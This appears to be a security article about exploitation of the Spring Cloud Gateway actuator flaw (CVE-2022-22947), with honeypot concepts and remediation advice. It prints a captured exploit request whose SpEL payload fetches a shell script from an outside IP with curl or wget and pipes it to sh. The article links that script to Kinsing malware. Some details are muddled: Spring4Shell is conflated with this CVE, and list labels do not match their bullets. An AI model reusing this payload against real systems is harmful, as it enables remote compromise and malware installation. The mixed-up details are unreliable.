How Hackers Exploit Spring Core Vulnerability in 2025: Proactive Measures to Detect Emerging Cyber Threats

API management has emerged as a critical and strategic factor in staying ahead of the market leaders. However, digital transformation has significant disadvantages, such as opening the door to hackers. 

Hackers have been quick to take advantage of a serious flaw in Spring Core, commonly known as SpringShell or Spring4Shell among security experts. The cybercriminal sends a specially created query to the Spring Core framework's web application server.

Thankfully, the combination of reactive (defensive) and proactive(threat hunting) approaches can provide a solution to mitigate against the evolving cyber threat landscape.

Remote Code Execution Vulnerability Targeting Spring Cloud Gateway 

In early 2022, a critical vulnerability (CVSS score: 10.0) was discovered in Spring Cloud Gateway. When the Gateway Actuator endpoint is enabled, exposed, and not properly secured, it opens the door to remote code injection. Attackers can exploit this flaw using the Actuator API to perform SpEL (Spring Expression Language) injection, potentially leading to full system compromise. Versions prior to 3.1.1 and 3.0.7 are affected (NVD - Cve-2022-22947, n.d.).

In this way, a threat actor could exploit the vulnerability by making a maliciously crafted request and allowing the attackers to insert arbitrary remote code on the target host.

Honeypot – Active Threat Hunting

Honeypot is a tool with intentional misconfigurations and vulnerabilities to gather the tactics and methodology used by the threat actor to exploit digitally connected assets and target applications. Such a trap machine makes attackers believe it's an actual target profile without knowing they are being trapped and monitored. 

Think of it as: you open the door of your house and find out who is trying to knock on the door, who enters the house, and how they react. 

The primary purpose of a honeypot is to attract and interact with malicious actors, such as hackers and cybercriminals, to gather valuable information about their tactics, techniques, and tools. The collected data with contextual information can be used for threat intelligence, research, and improving overall cybersecurity defenses. The honeypot must be adapted to observing manual attacks while staying as elusive and transparent as possible to avoid their detection by the attackers.

What Value Does a Honeypot Add to an Organization's Network Security?

The following are a few key reasons for adding honeypots in the pipeline of an organization's cyber defense systems: 

• Early detection of attacks: Pre-empt the cyber attacks before they reach the tangible assets.
• Threat Intelligence: Accurate threat intelligence to gain insights into new attacks, exploits, malware, tools, and techniques. 
• Signature generation: Generate an antidote for the newly discovered attacks.
• Distraction: Trap hackers by redirecting them from actual assets.
• Security verification: Verify how secure the organization's environment is.

Honeypot Types

Before deploying a honeypot, it’s crucial to understand the various types and their strategic roles in threat detection.

Types of attacked resources: Pre-empt cyber attacks before they reach critical assets.

• Client honeypot: Exploit client-side vulnerabilities, also called active honeypot
• Server honeypot: Exploit server-side vulnerabilities, also called passive honeypots

Level of interaction: Accurate threat intelligence to gain insights into new attacks, exploits, malware, tools, and techniques. 

• Low interaction: Provides an emulation environment to the hacker, with no tangible assets. Usually, simple to set up.
• High Interaction: Provides a real-environment and assets for more extended engagement with the hacker. Usually, costly to set up and maintain.

Kinds of deployments: Generate an antidote for the newly discovered attacks.

• Production honeypot: To deceive hackers in a production network and protect tangible assets. 
• Research honeypot: For a deeper understanding of hackers' tactics. Usually, hackers can "jailbreak into" full-blown tangible assets. 

Implementation: Gathering PoC Exploits and Malware

Figure 1 shows the emulation environment in a low interaction honeypot to engage the threat actor and to gather exploits and malware targeting Spring Cloud Gateway applications.

Figure 1: Basic Workflow of Honeypot Emulation

Network Traffic Analysis

The attacker sends a Post Request + JSON code to create a new route in the Spring Cloud Gateway, and with the JSON CONFIG FILE, it configures the RESPONSE HEADER of that route.  

Step 1: Figure 2 illustrates the “Post” request and response communication extracted from PCAP dump files using deep packet inspection.

Figure 2: “Post” request and response communication

Step 2: Triggers config reload via Spring Gateway /actuator/gateway/refresh endpoint, which may allow attackers to apply malicious configuration changes if not properly secured (Refer to Figure 3).

Figure 3: The Config_file

Step 3: Figure 4 shows the remote command execution to fetch the created route to confirm command execution via SpEL injection (e.g., uid=0(root)).

Figure 4: Command Execution via SpEL injection

Step 4: Figure 5 shows the deletion of the created route to avoid the detection.

Figure 5: Hiding Trace to Avoid Detection

Decoded Base64 Shell Code

Once the Base64 script is decoded, a URL has an embedded script, as shown in Figure 6. Once the script is manually downloaded in a controlled, isolated environment using the wget command on a Linux machine, it contains malware known as “KINSING MALWARE”.

POST /actuator/gateway/routes/BuOHOGeywH HTTP/1.1Host: 180.188.253.170:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 411
Content-Type: application/json
Accept-Encoding: gzip
{
"id": "BuOHOGeywH",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 94.103.87.71/scg.sh||wget -q -O- 94.103.87.71/scg.sh)|sh\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
}

Figure 6: Detected Kinsing Malware Family

The “KINSING MALWARE” is analyzed using VirusTotal API as shown in figure 7 and a threat score of 39/66 is given by AV scanners.

Figure 7: Virustotal Analysis of Collected Malware Sample

Remedial and Recommendations

• Enhanced protection with next-generation firewall and configure the protection rule sets against SpringShell vulnerabilities and exploits.
• Deploy regional or commercial Azure Application Gateway. Enable WAF rules specifically designed to defend against SpringShell exploits.
• our strongest defense is upgrading to the latest patched version of Spring Security. Developers should also test for consistent response times, regardless of whether login credentials are valid, to avoid leaking clues to attackers.
• Install the latest Anti-virus scanners and periodically update the signature database of AV scanners.
• Practice active threat hunting instead of complete dependence on a reactive security approach. 
• Educate users and staff about the cyber hygiene practices.

Reference

1. NVD - cve-2022-22947. (n.d.). https://nvd.nist.gov/vuln/detail/cve-2022-22947